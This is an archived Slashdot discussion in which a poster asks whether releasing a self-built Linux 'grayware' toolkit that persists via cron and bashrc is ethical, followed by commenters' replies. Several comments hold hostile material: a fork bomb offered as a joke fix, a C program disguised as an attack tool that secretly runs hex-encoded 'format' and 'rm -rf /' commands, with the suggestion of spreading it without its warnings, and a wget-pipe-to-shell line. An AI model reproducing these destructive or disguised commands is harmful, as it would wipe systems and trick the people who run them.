<article>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#article09_12_01_0025213</id>
	<title>Ethics of Releasing Non-Malicious Linux Malware?</title>
	<author>kdawson</author>
	<datestamp>1259678340000</datestamp>
	<htmltext>buchner.johannes writes <i>"I was fed up with the general consensus that Linux is oh-so-secure and has no malware. After a week of work, I finished a package of malware for Unix/Linux. Its whole purpose is to help white-hat hackers point out that a Linux system can be turned into a botnet client by simply downloading BOINC and attaching it to a user account to help scientific projects. The malware does not exploit any security holes, only loose security configurations and mindless execution of unverified downloads. I tested it to be injected by a PHP script (even circumventing safe mode), so that the Web server runs it; I even got a proxy server that injects it into shell scripts and makefiles in tarballs on the fly, and adds onto Windows executables for execution in Wine. If executed by the user, the malware can persist itself in cron, bashrc and other files. The aim of the exercise was to provide a payload so security people can 'pwn' systems to show security holes, without doing harm (such as deleting files or disrupting normal operation). But now I am unsure of whether it is ethically OK to release this toolkit, which, by ripping out the BOINC payload and putting in something really evil, could be turned into proper Linux malware. On the one hand, the way it persists itself in autostart is really nasty, and that is not really a security hole that can be fixed. On the other hand, such a script can be written by anyone else too, and it would be useful to show people why you need SELinux on a server, and why verifying the source of downloads (checksums through trusted channels) is necessary. Technically, it is a nice piece, but should I release it? I don't want to turn the Linux desktop into Windows, hence I'm slightly leaning towards not releasing it. What does your ethics say about releasing such grayware?"</i></htmltext>
<tokenext>buchner.johannes writes " I was fed up with the general consensus that Linux is oh-so-secure and has no malware .
After a week of work , I finished a package of malware for Unix/Linux .
Its whole purpose is to help white-hat hackers point out that a Linux system can be turned into a botnet client by simply downloading BOINC and attaching it to a user account to help scientific projects .
The malware does not exploit any security holes , only loose security configurations and mindless execution of unverified downloads .
I tested it to be injected by a PHP script ( even circumventing safe mode ) , so that the Web server runs it ; I even got a proxy server that injects it into shell scripts and makefiles in tarballs on the fly , and adds onto Windows executables for execution in Wine .
If executed by the user , the malware can persist itself in cron , bashrc and other files .
The aim of the exercise was to provide a payload so security people can 'pwn ' systems to show security holes , without doing harm ( such as deleting files or disrupting normal operation ) .
But now I am unsure of whether it is ethically OK to release this toolkit , which , by ripping out the BOINC payload and putting in something really evil , could be turned into proper Linux malware .
On the one hand , the way it persists itself in autostart is really nasty , and that is not really a security hole that can be fixed .
On the other hand , such a script can be written by anyone else too , and it would be useful to show people why you need SELinux on a server , and why verifying the source of downloads ( checksums through trusted channels ) is necessary .
Technically , it is a nice piece , but should I release it ?
I do n't want to turn the Linux desktop into Windows , hence I 'm slightly leaning towards not releasing it .
What does your ethics say about releasing such grayware ?
"</tokentext>
<sentencetext>buchner.johannes writes "I was fed up with the general consensus that Linux is oh-so-secure and has no malware.
After a week of work, I finished a package of malware for Unix/Linux.
Its whole purpose is to help white-hat hackers point out that a Linux system can be turned into a botnet client by simply downloading BOINC and attaching it to a user account to help scientific projects.
The malware does not exploit any security holes, only loose security configurations and mindless execution of unverified downloads.
I tested it to be injected by a PHP script (even circumventing safe mode), so that the Web server runs it; I even got a proxy server that injects it into shell scripts and makefiles in tarballs on the fly, and adds onto Windows executables for execution in Wine.
If executed by the user, the malware can persist itself in cron, bashrc and other files.
The aim of the exercise was to provide a payload so security people can 'pwn' systems to show security holes, without doing harm (such as deleting files or disrupting normal operation).
But now I am unsure of whether it is ethically OK to release this toolkit, which, by ripping out the BOINC payload and putting in something really evil, could be turned into proper Linux malware.
On the one hand, the way it persists itself in autostart is really nasty, and that is not really a security hole that can be fixed.
On the other hand, such a script can be written by anyone else too, and it would be useful to show people why you need SELinux on a server, and why verifying the source of downloads (checksums through trusted channels) is necessary.
Technically, it is a nice piece, but should I release it?
I don't want to turn the Linux desktop into Windows, hence I'm slightly leaning towards not releasing it.
What does your ethics say about releasing such grayware?
"</sentencetext>
</article>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30286574</id>
	<title>Release it. This is old hat.</title>
	<author>gfolkert</author>
	<datestamp>1259696760000</datestamp>
	<modclass>Interestin</modclass>
	<modscore>2</modscore>
	<htmltext><p>I'm sorry, but running userland "daemons" is child's play. This has been around for EONs. Please don't think you have something new here.</p><p>You problem here is that, you idea will only affect the *USER* environment, not the machine. Anything you run or install into the user environment will be bound by the standard user accounts everyone should be running as, without privileges (such as root/super user)</p><p>This separate the privileges from the user and the system quite well and delineates it.</p><p>Lets compare Windows and *NIX (in general):</p><p>Windows, I can send you and e-mail and you standard user just looks at my e-mail and via ActiveX can leverage a 10 year old exploit to install a service as a *SYSTEM ACCOUNT*. This means my process then has full access to the system... Possibly being able to wipe out the machine period, or use it for a launching pad to send out e-mails to other accounts on the system or other account in any address book or just grab your passwords (probably being abcd1234 or password or  or what have you (Think Sarah Palin's Yahoo account... wooo really good password there)) for your Bank account. Its very much *THAT* simple, no stupidity involved.</p><p>Now, if for some reason ActiveX is disabled, I can just tell you how important the Microsoft update is and it needs to be run... and how you *MUST* forward it to your friends so they can be safe... Sheeple are gullible and will never be safe from this stupidity.</p><p>Now speaking of stupidity, its really the only way Linux/*NIX/*BSDs will be compromised... even then most likely only the *user's* data will be flogged. Not the whole system. Now, let us just say *I* download and run your program/update/shell/python script/perl script/etc... Sure it downloads and installs the BOINC daemon and runs in the background... to be honest who cares. Any program you run or have running to capture data from the user will only affect the *USER* not the whole system. Separation of privileges is pure and simple why the *NIX systems will not seriously fall prey to these kinds of things. And to be honest, unless you install a persistent AT job for the BOINC daemon to start or at the very least a cronjob that runs every minute... a reboot will kill your pitiful attempt.</p></htmltext>
<tokenext>I 'm sorry , but running userland " daemons " is child 's play .
This has been around for EONs .
Please do n't think you have something new here.You problem here is that , you idea will only affect the * USER * environment , not the machine .
Anything you run or install into the user environment will be bound by the standard user accounts everyone should be running as , without privileges ( such as root/super user ) This separate the privileges from the user and the system quite well and delineates it.Lets compare Windows and * NIX ( in general ) : Windows , I can send you and e-mail and you standard user just looks at my e-mail and via ActiveX can leverage a 10 year old exploit to install a service as a * SYSTEM ACCOUNT * .
This means my process then has full access to the system... Possibly being able to wipe out the machine period , or use it for a launching pad to send out e-mails to other accounts on the system or other account in any address book or just grab your passwords ( probably being abcd1234 or password or or what have you ( Think Sarah Palin 's Yahoo account... wooo really good password there ) ) for your Bank account .
Its very much * THAT * simple , no stupidity involved.Now , if for some reason ActiveX is disabled , I can just tell you how important the Microsoft update is and it needs to be run... and how you * MUST * forward it to your friends so they can be safe... Sheeple are gullible and will never be safe from this stupidity.Now speaking of stupidity , its really the only way Linux/ * NIX/ * BSDs will be compromised... even then most likely only the * user 's * data will be flogged .
Not the whole system .
Now , let us just say * I * download and run your program/update/shell/python script/perl script/etc... Sure it downloads and installs the BOINC daemon and runs in the background... to be honest who cares .
Any program you run or have running to capture data from the user will only affect the * USER * not the whole system .
Separation of privileges is pure and simple why the * NIX systems will not seriously fall prey to these kinds of things .
And to be honest , unless you install a persistent AT job for the BOINC daemon to start or at the very least a cronjob that runs every minute... a reboot will kill your pitiful attempt .</tokentext>
<sentencetext>I'm sorry, but running userland "daemons" is child's play.
This has been around for EONs.
Please don't think you have something new here.You problem here is that, you idea will only affect the *USER* environment, not the machine.
Anything you run or install into the user environment will be bound by the standard user accounts everyone should be running as, without privileges (such as root/super user)This separate the privileges from the user and the system quite well and delineates it.Lets compare Windows and *NIX (in general):Windows, I can send you and e-mail and you standard user just looks at my e-mail and via ActiveX can leverage a 10 year old exploit to install a service as a *SYSTEM ACCOUNT*.
This means my process then has full access to the system... Possibly being able to wipe out the machine period, or use it for a launching pad to send out e-mails to other accounts on the system or other account in any address book or just grab your passwords (probably being abcd1234 or password or  or what have you (Think Sarah Palin's Yahoo account... wooo really good password there)) for your Bank account.
Its very much *THAT* simple, no stupidity involved.Now, if for some reason ActiveX is disabled, I can just tell you how important the Microsoft update is and it needs to be run... and how you *MUST* forward it to your friends so they can be safe... Sheeple are gullible and will never be safe from this stupidity.Now speaking of stupidity, its really the only way Linux/*NIX/*BSDs will be compromised... even then most likely only the *user's* data will be flogged.
Not the whole system.
Now, let us just say *I* download and run your program/update/shell/python script/perl script/etc... Sure it downloads and installs the BOINC daemon and runs in the background... to be honest who cares.
Any program you run or have running to capture data from the user will only affect the *USER* not the whole system.
Separation of privileges is pure and simple why the *NIX systems will not seriously fall prey to these kinds of things.
And to be honest, unless you install a persistent AT job for the BOINC daemon to start or at the very least a cronjob that runs every minute... a reboot will kill your pitiful attempt.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279036</id>
	<title>loose execution of unverified downloads...</title>
	<author>Anonymous</author>
	<datestamp>1259599380000</datestamp>
	<modclass>Funny</modclass>
	<modscore>1</modscore>
	<htmltext><p>The exploit relies on "loose execution of unverified downloads"...</p><p>Is this the joke about the virus that spreads itself by telling the user "send this email to all your friends then format your hard drive" ?</p><p>Once you have code executed on a machine that doesn't have good security, you manage to get local root exploit and then do some "really nasty thing" to persist a reboot?</p><p>Please?</p><p>Really nasty as in escaping offline IDS?</p><p>Publish your kiddie exploit, I'm laughing out loud...</p><p>: )</p></htmltext>
<tokenext>The exploit relies on " loose execution of unverified downloads " ...Is this the joke about the virus that spreads itself by telling the user " send this email to all your friends then format your hard drive " ? Once you have code executed on a machine that does n't have good security , you manage to get local root exploit and then do some " really nasty thing " to persist a reboot ? Please ? Really nasty as in escaping offline IDS ? Publish your kiddie exploit , I 'm laughing out loud... : )</tokentext>
<sentencetext>The exploit relies on "loose execution of unverified downloads"...Is this the joke about the virus that spreads itself by telling the user "send this email to all your friends then format your hard drive" ?Once you have code executed on a machine that doesn't have good security, you manage to get local root exploit and then do some "really nasty thing" to persist a reboot?Please?Really nasty as in escaping offline IDS?Publish your kiddie exploit, I'm laughing out loud...: )</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278990</id>
	<title>Re:Commendable</title>
	<author>Anonymous</author>
	<datestamp>1259598960000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Here, this code will remove all your worries with Xorg:<nobr> <wbr></nobr>:(){<nobr> <wbr></nobr>:|:&amp;};:</p></htmltext>
<tokenext>Here , this code will remove all your worries with Xorg : : ( ) { : | : &amp; } ; :</tokentext>
<sentencetext>Here, this code will remove all your worries with Xorg: :(){ :|:&amp;};:</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278620</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30289562</id>
	<title>Release it</title>
	<author>Anonymous</author>
	<datestamp>1259665020000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>I don't think it matters what I write here... you will release it.</p></htmltext>
<tokenext>I do n't think it matters what I write here... you will release it .</tokentext>
<sentencetext>I don't think it matters what I write here... you will release it.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280962</id>
	<title>patent it</title>
	<author>smash</author>
	<datestamp>1259664060000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>.. and then sue anyone who hacks you with the process you've discovered.
<p><nobr> <wbr></nobr>:D</p></htmltext>
<tokenext>.. and then sue anyone who hacks you with the process you 've discovered .
: D</tokentext>
<sentencetext>.. and then sue anyone who hacks you with the process you've discovered.
:D</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279756</id>
	<title>Malware is... bad... right?</title>
	<author>Thaidog</author>
	<datestamp>1259606280000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>So don't release it. Pretty straight forward if you ask me.</p></htmltext>
<tokenext>So do n't release it .
Pretty straight forward if you ask me .</tokentext>
<sentencetext>So don't release it.
Pretty straight forward if you ask me.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30303384</id>
	<title>Well...</title>
	<author>DaVince21</author>
	<datestamp>1259578260000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>If you're so afraid, release it, but don't open-source it. Though since you have made this already anyway, people are going to make their own malware eventually.</p></htmltext>
<tokenext>If you 're so afraid , release it , but do n't open-source it .
Though since you have made this already anyway , people are going to make their own malware eventually .</tokentext>
<sentencetext>If you're so afraid, release it, but don't open-source it.
Though since you have made this already anyway, people are going to make their own malware eventually.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30282408</id>
	<title>Another huge difference</title>
	<author>Tony</author>
	<datestamp>1259678880000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>2</modscore>
	<htmltext><p>So one of my users accidentally runs your trojan. No problem. I write a script that cleans it up on every machine in my network without interfering with the users at all. It takes me about 5 minutes.</p><p>On MS-Windows, I have to go around to every machine on the network to clean it up. There have been times I've had to re-ghost a machine because it was so infected.</p><p>I'm not sure what this whole apple-to-oranges gedanken is all about. It surely doesn't explain how MS-Windows is just as secure as Linux.</p></htmltext>
<tokenext>So one of my users accidentally runs your trojan .
No problem .
I write a script that cleans it up on every machine in my network without interfering with the users at all .
It takes me about 5 minutes.On MS-Windows , I have to go around to every machine on the network to clean it up .
There have been times I 've had to re-ghost a machine because it was so infected.I 'm not sure what this whole apple-to-oranges gedanken is all about .
It surely does n't explain how MS-Windows is just as secure as Linux .</tokentext>
<sentencetext>So one of my users accidentally runs your trojan.
No problem.
I write a script that cleans it up on every machine in my network without interfering with the users at all.
It takes me about 5 minutes.On MS-Windows, I have to go around to every machine on the network to clean it up.
There have been times I've had to re-ghost a machine because it was so infected.I'm not sure what this whole apple-to-oranges gedanken is all about.
It surely doesn't explain how MS-Windows is just as secure as Linux.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279146</id>
	<title>Re:Dear Slashdot</title>
	<author>slyn</author>
	<datestamp>1259600580000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>3</modscore>
	<htmltext><p>People do NOT walk around the world indiscriminately. They avoid bad neighborhoods, treat suspicious people like aliens, profile people in any way possible, and then react. Take a white male and walk them around times square, then a full body tattooed, gauged ear, sub-dermal implanted carnival exhibit and walk them through the same area and watch the difference in how people  react. They may be the nicest person in the world but the women will still hug their purses and the men will lower their heads. Ever heard "Don't look at anybody on the subway/bus/EL/whatever"? It's because people acknowledge that there are mouthbreathing retards that will fuck you up because you looked at them funny or because they like your briefcase.</p><p>People DO interact with the internet indiscriminately. Most can't tell a good site from a bad site, don't know the difference between a "funnycats.avi" and "funnycats.avi.exe", blah blah blah blah blah. Chances are if you are reading this you have fixed someone's computer because of this haphazard e-disregard, so I don't need to tell you that most people just don't get safe browsing practices.</p><p>This guys issue is that there is a select, very vocal group of people who think they are safe on the net but aren't, so he wrote a proof-of-concept to show them that it doesn't matter what platform you are on, there is no replacement for safe browsing practices (and not using default passwords, and and and and and...).</p></htmltext>
<tokenext>People do NOT walk around the world indiscriminately .
They avoid bad neighborhoods , treat suspicious people like aliens , profile people in any way possible , and then react .
Take a white male and walk them around times square , then a full body tattooed , gauged ear , sub-dermal implanted carnival exhibit and walk them through the same area and watch the difference in how people react .
They may be the nicest person in the world but the women will still hug their purses and the men will lower their heads .
Ever heard " Do n't look at anybody on the subway/bus/EL/whatever " ?
It 's because people acknowledge that there are mouthbreathing retards that will fuck you up because you looked at them funny or because they like your briefcase.People DO interact with the internet indiscriminately .
Most ca n't tell a good site from a bad site , do n't know the difference between a " funnycats.avi " and " funnycats.avi.exe " , blah blah blah blah blah .
Chances are if you are reading this you have fixed someone 's computer because of this haphazard e-disregard , so I do n't need to tell you that most people just do n't get safe browsing practices.This guys issue is that there is a select , very vocal group of people who think they are safe on the net but are n't , so he wrote a proof-of-concept to show them that it does n't matter what platform you are on , there is no replacement for safe browsing practices ( and not using default passwords , and and and and and... ) .</tokentext>
<sentencetext>People do NOT walk around the world indiscriminately.
They avoid bad neighborhoods, treat suspicious people like aliens, profile people in any way possible, and then react.
Take a white male and walk them around times square, then a full body tattooed, gauged ear, sub-dermal implanted carnival exhibit and walk them through the same area and watch the difference in how people  react.
They may be the nicest person in the world but the women will still hug their purses and the men will lower their heads.
Ever heard "Don't look at anybody on the subway/bus/EL/whatever"?
It's because people acknowledge that there are mouthbreathing retards that will fuck you up because you looked at them funny or because they like your briefcase.People DO interact with the internet indiscriminately.
Most can't tell a good site from a bad site, don't know the difference between a "funnycats.avi" and "funnycats.avi.exe", blah blah blah blah blah.
Chances are if you are reading this you have fixed someone's computer because of this haphazard e-disregard, so I don't need to tell you that most people just don't get safe browsing practices.This guys issue is that there is a select, very vocal group of people who think they are safe on the net but aren't, so he wrote a proof-of-concept to show them that it doesn't matter what platform you are on, there is no replacement for safe browsing practices (and not using default passwords, and and and and and...).</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278730</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30285404</id>
	<title>Don't bother releasing</title>
	<author>Anonymous</author>
	<datestamp>1259692500000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>You are obviously thinking more about this than I ever did. Don't worry about it. This sort of stuff has existed since before Thompson wrote a backdoor into the c compiler.</p><p>I wrote some similar stuff some years ago, as an exercise. I didn't release anything because I figured everything I did was obvious or trivial. Anyone that wanted to use something like this could have written it themselves.</p><p>I didn't think of the Wine angle, that's neat. Of course, I've never used Wine, so perhaps I'm excused.<nobr> <wbr></nobr>;-)</p></htmltext>
<tokenext>You are obviously thinking more about this than I ever did .
Do n't worry about it .
This sort of stuff has existed since before Thompson wrote a backdoor into the c compiler.I wrote some similar stuff some years ago , as an exercise .
I did n't release anything because I figured everything I did was obvious or trivial .
Anyone that wanted to use something like this could have written it themselves.I did n't think of the Wine angle , that 's neat .
Of course , I 've never used Wine , so perhaps I 'm excused .
; - )</tokentext>
<sentencetext>You are obviously thinking more about this than I ever did.
Don't worry about it.
This sort of stuff has existed since before Thompson wrote a backdoor into the c compiler.I wrote some similar stuff some years ago, as an exercise.
I didn't release anything because I figured everything I did was obvious or trivial.
Anyone that wanted to use something like this could have written it themselves.I didn't think of the Wine angle, that's neat.
Of course, I've never used Wine, so perhaps I'm excused.
;-)</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30282724</id>
	<title>Oxymoron?</title>
	<author>DaFallus</author>
	<datestamp>1259680500000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>How can there be such a thing as non-malicious malware when malware is a portmanteau of "malicious software"?</htmltext>
<tokenext>How can there be such a thing as non-malicious malware when malware is a portmanteau of " malicious software " ?</tokentext>
<sentencetext>How can there be such a thing as non-malicious malware when malware is a portmanteau of "malicious software"?</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281264</id>
	<title>There is No Security</title>
	<author>gselfridge</author>
	<datestamp>1259667060000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>If someone wants your network, they will take it regardless of how much security is implemented. It's that simple.</p></htmltext>
<tokenext>If someone wants your network , they will take it regardless of how much security is implemented .
It 's that simple .</tokentext>
<sentencetext>If someone wants your network, they will take it regardless of how much security is implemented.
It's that simple.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280520</id>
	<title>Re:ask yourself this question</title>
	<author>Anonymous</author>
	<datestamp>1259659500000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p><div class="quote"><p>but you're limiting the exposure to the average bored 15 year old who's skillset doesn't extend too far beyond downloading a<nobr> <wbr></nobr>.c file and running gcc.</p></div><p>Well that gave me an idea: why not beat 'em at their own game? Distribute this code snippet anywhere you suspect wanna-be script kiddies are hanging out (and make sure to remove the warnings if you want them to fall for the trap).</p><p>WARNING: Do not run this program.  (Hint: 0x66, 0x6f, 0x72, 0x6d, 0x61, 0x74 = format, and 0x2d, 0x72 = rm)</p><blockquote><div><p><nobr> <wbr></nobr><tt>/* Teh Be5t sCr1pT 2 pWn2oRz jOuR eNeM1e5.<br>
&nbsp; Just compile with gcc and run it with your enemy's IP address!<br>
&nbsp; Guaranteed to do more damage than win-nuke! */<br>#include &lt;stdio.h&gt;<br>#include &lt;stdlib.h&gt;<br>char data[] = {<br>
&nbsp; 0x66, 0x6f, 0x72, 0x6d, 0x61, 0x74, 0x20, 0x63, 0x3a,<br>
&nbsp; 0x20, 0x2f, 0x71, 0x00, 0x72, 0x6d, 0x20, 0x2d, 0x72,<br>
&nbsp; 0x66, 0x20, 0x2f, 0x00<br>};<br>int main (int argc, char **argv) {<br>
&nbsp; printf ("Preparing to pwn \%s...\n", argv[1]), fflush(stdout);<br>
&nbsp; system (&amp;000[data]), system (&amp;015[data]);<br>
&nbsp; printf ("Haha! You just pwned \%s!\n", argv[1]);<br>
&nbsp; return EXIT\_SUCCESS;<br>}</tt></p></div> </blockquote><p>WARNING: Do not run this program.  (Hint: 0x66, 0x6f, 0x72, 0x6d, 0x61, 0x74 = format, and 0x2d, 0x72 = rm)</p></div>
	</htmltext>
<tokenext>but you 're limiting the exposure to the average bored 15 year old who 's skillset does n't extend too far beyond downloading a .c file and running gcc.Well that gave me an idea : why not beat 'em at their own game ?
Distribute this code snippet anywhere you suspect wan na-be script kiddies are hanging out ( and make sure to remove the warnings if you want them to fall for the trap ) .WARNING : Do not run this program .
( Hint : 0x66 , 0x6f , 0x72 , 0x6d , 0x61 , 0x74 = format , and 0x2d , 0x72 = rm ) / * Teh Be5t sCr1pT 2 pWn2oRz jOuR eNeM1e5 .
  Just compile with gcc and run it with your enemy 's IP address !
  Guaranteed to do more damage than win-nuke !
* / # include # include char data [ ] = {   0x66 , 0x6f , 0x72 , 0x6d , 0x61 , 0x74 , 0x20 , 0x63 , 0x3a ,   0x20 , 0x2f , 0x71 , 0x00 , 0x72 , 0x6d , 0x20 , 0x2d , 0x72 ,   0x66 , 0x20 , 0x2f , 0x00 } ; int main ( int argc , char * * argv ) {   printf ( " Preparing to pwn \ % s... \ n " , argv [ 1 ] ) , fflush ( stdout ) ;   system ( &amp;000 [ data ] ) , system ( &amp;015 [ data ] ) ;   printf ( " Haha !
You just pwned \ % s ! \ n " , argv [ 1 ] ) ;   return EXIT \ _SUCCESS ; } WARNING : Do not run this program .
( Hint : 0x66 , 0x6f , 0x72 , 0x6d , 0x61 , 0x74 = format , and 0x2d , 0x72 = rm )</tokentext>
<sentencetext>but you're limiting the exposure to the average bored 15 year old who's skillset doesn't extend too far beyond downloading a .c file and running gcc.Well that gave me an idea: why not beat 'em at their own game?
Distribute this code snippet anywhere you suspect wanna-be script kiddies are hanging out (and make sure to remove the warnings if you want them to fall for the trap).WARNING: Do not run this program.
(Hint: 0x66, 0x6f, 0x72, 0x6d, 0x61, 0x74 = format, and 0x2d, 0x72 = rm) /* Teh Be5t sCr1pT 2 pWn2oRz jOuR eNeM1e5.
  Just compile with gcc and run it with your enemy's IP address!
  Guaranteed to do more damage than win-nuke!
*/#include #include char data[] = {
  0x66, 0x6f, 0x72, 0x6d, 0x61, 0x74, 0x20, 0x63, 0x3a,
  0x20, 0x2f, 0x71, 0x00, 0x72, 0x6d, 0x20, 0x2d, 0x72,
  0x66, 0x20, 0x2f, 0x00};int main (int argc, char **argv) {
  printf ("Preparing to pwn \%s...\n", argv[1]), fflush(stdout);
  system (&amp;000[data]), system (&amp;015[data]);
  printf ("Haha!
You just pwned \%s!\n", argv[1]);
  return EXIT\_SUCCESS;} WARNING: Do not run this program.
(Hint: 0x66, 0x6f, 0x72, 0x6d, 0x61, 0x74 = format, and 0x2d, 0x72 = rm)
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279562</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278862</id>
	<title>DONT.DO.IT</title>
	<author>Pharago</author>
	<datestamp>1259597940000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>yeah, in all it's capitalized glory, that was my opinion right on the title.
why so? because there will be time for that, there is enough crappy stuff floating on the intertubes as to release a 'toolkit' that allows to add the whole world of linux servers to the fotm botnet</htmltext>
<tokenext>yeah , in all it 's capitalized glory , that was my opinion right on the title .
why so ?
because there will be time for that , there is enough crappy stuff floating on the intertubes as to release a 'toolkit ' that allows to add the whole world of linux servers to the fotm botnet</tokentext>
<sentencetext>yeah, in all it's capitalized glory, that was my opinion right on the title.
why so?
because there will be time for that, there is enough crappy stuff floating on the intertubes as to release a 'toolkit' that allows to add the whole world of linux servers to the fotm botnet</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279236</id>
	<title>I would like you to join my bot net</title>
	<author>codepunk</author>
	<datestamp>1259601420000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Would you be so kind as to open a terminal window mr user and run this for me so that you can join<br>my cool bot net.</p><p>wget www.somewhere.com/somefile.sh -O - | sh</p><p>Oh no what will the community do,  I may have just released a very serious malware exploit vector.</p></htmltext>
<tokenext>Would you be so kind as to open a terminal window mr user and run this for me so that you can joinmy cool bot net.wget www.somewhere.com/somefile.sh -O - | shOh no what will the community do , I may have just released a very serious malware exploit vector .</tokentext>
<sentencetext>Would you be so kind as to open a terminal window mr user and run this for me so that you can joinmy cool bot net.wget www.somewhere.com/somefile.sh -O - | shOh no what will the community do,  I may have just released a very serious malware exploit vector.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279512</id>
	<title>Re:Why not send it to Linus?</title>
	<author>Suicyco</author>
	<datestamp>1259604000000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>What does Linus have to do with anything other than the kernel itself? He isn't part of PHP, Apache, openssh, mozilla, Gnome, gcc (etc) or attached to any distro. Unless its a kernel exploit he would be powerless to fix it and wouldn't care. There are a million ways to write such software, any competent linux dev could do so. The thing is, it doesn't matter, because it can be nullified by simple policy changes - and the fact that no two distro's are alike, "linux" can be a whole slew of differing combinations of software.</p><p>Putting something like this in the "wild" is nothing worse than metasploit, nmap, satan or any number of other tool sets. GCC and bash are just as dangerous a "toolkit".</p><p>His supposed killer malware is bullshit anyway, he's provided no details. What webserver? What distro? What does SELinux have to do with it? Is he requiring the user to know the root password, and type it in?</p><p>How about a bash script with "rm -rf<nobr> <wbr></nobr>/*" ran as root? Is that malware?</p><p>Do you know how many exploitable apps are in / have been in linux over the years? Unix in general? A shit ton! This is nothing new, revolutionary or extraordinary.</p></htmltext>
<tokenext>What does Linus have to do with anything other than the kernel itself ?
He is n't part of PHP , Apache , openssh , mozilla , Gnome , gcc ( etc ) or attached to any distro .
Unless its a kernel exploit he would be powerless to fix it and would n't care .
There are a million ways to write such software , any competent linux dev could do so .
The thing is , it does n't matter , because it can be nullified by simple policy changes - and the fact that no two distro 's are alike , " linux " can be a whole slew of differing combinations of software.Putting something like this in the " wild " is nothing worse than metasploit , nmap , satan or any number of other tool sets .
GCC and bash are just as dangerous a " toolkit " .His supposed killer malware is bullshit anyway , he 's provided no details .
What webserver ?
What distro ?
What does SELinux have to do with it ?
Is he requiring the user to know the root password , and type it in ? How about a bash script with " rm -rf / * " ran as root ?
Is that malware ? Do you know how many exploitable apps are in / have been in linux over the years ?
Unix in general ?
A shit ton !
This is nothing new , revolutionary or extraordinary .</tokentext>
<sentencetext>What does Linus have to do with anything other than the kernel itself?
He isn't part of PHP, Apache, openssh, mozilla, Gnome, gcc (etc) or attached to any distro.
Unless its a kernel exploit he would be powerless to fix it and wouldn't care.
There are a million ways to write such software, any competent linux dev could do so.
The thing is, it doesn't matter, because it can be nullified by simple policy changes - and the fact that no two distro's are alike, "linux" can be a whole slew of differing combinations of software.Putting something like this in the "wild" is nothing worse than metasploit, nmap, satan or any number of other tool sets.
GCC and bash are just as dangerous a "toolkit".His supposed killer malware is bullshit anyway, he's provided no details.
What webserver?
What distro?
What does SELinux have to do with it?
Is he requiring the user to know the root password, and type it in?How about a bash script with "rm -rf /*" ran as root?
Is that malware?Do you know how many exploitable apps are in / have been in linux over the years?
Unix in general?
A shit ton!
This is nothing new, revolutionary or extraordinary.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278970</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30288340</id>
	<title>How about full disclosure?</title>
	<author>jonaskoelker</author>
	<datestamp>1259659860000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>then show this code to whomever it will help actually fix those holes but try not to release it to the public at large</p></div><p>I'm sorry to bring up an argument that everyone has already heard (or work out on their own), but I think it warrants a saying (yet again):</p><p>How about also releasing information about workarounds to the countless systems administrators who are in a position to deploy that workaround?  (Good luck on doing that while not releasing information to the general public)</p></div>
	</htmltext>
<tokenext>then show this code to whomever it will help actually fix those holes but try not to release it to the public at largeI 'm sorry to bring up an argument that everyone has already heard ( or work out on their own ) , but I think it warrants a saying ( yet again ) : How about also releasing information about workarounds to the countless systems administrators who are in a position to deploy that workaround ?
